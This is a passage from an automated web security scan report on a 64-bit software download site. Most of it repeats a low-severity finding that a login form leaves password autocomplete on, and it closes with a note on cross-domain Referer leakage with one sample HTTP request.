3.81. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.82. http://www.x64bitdownload.com/64-bit-usenet-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.83. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.84. http://www.x64bitdownload.com/64-bit-usenext-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.85. http://www.x64bitdownload.com/64-bit-video-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.86. http://www.x64bitdownload.com/64-bit-xpat-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.87. http://www.x64bitdownload.com/64-bit-yenc-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.88. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/a-oz-insight-1768-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.89. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.90. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.91. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.92. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.93. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.94. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.95. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.96. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.97. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.98. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.99. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.100. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.101. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.102. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.103. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.104. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.105. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.106. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.107. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.108. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.109. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.110. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.111. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.112. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.113. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.114. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.115. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.116. http://www.x64bitdownload.com/contact.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.117. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.118. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.119. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.120. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.121. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.122. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.123. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.124. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.125. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.126. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.127. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.128. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.129. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.130. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.131. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.132. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.133. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.134. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.135. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.136. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.137. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.138. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.139. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.140. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.141. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.142. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.143. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.144. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.145. http://www.x64bitdownload.com/drivers/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.146. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.147. http://www.x64bitdownload.com/featured-software.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/featured-software.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.148. http://www.x64bitdownload.com/linktous.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/linktous.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.149. http://www.x64bitdownload.com/new-reviews.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-reviews.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.150. http://www.x64bitdownload.com/new-software.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-software.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.151. http://www.x64bitdownload.com/saved-software.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.152. http://www.x64bitdownload.com/saved-software.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.153. http://www.x64bitdownload.com/software-advanced.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.154. http://www.x64bitdownload.com/submit-pad-file.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/submit-pad-file.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.155. http://www.x64bitdownload.com/tellafriend.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/tellafriend.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.156. http://www.x64bitdownload.com/top-software-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/top-software-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

4. Cross-domain Referer leakage previous next
There are 2 instances of this issue:

/contact.html
/software-advanced.html

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

4.1. http://www.x64bitdownload.com/contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.x64bitdownload.com/contact.html?subject=Advertising+inquiry

The response contains the following links to other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js
http://s7.addthis.com/static/btn/lg-bookmark-en.gif
http://s7.addthis.com/static/btn/lg-rss-en.gif
http://www.addthis.com/bookmark.php
http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=
http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen
http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg

Request

GET /contact.html?subject=Advertising+inquiry HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
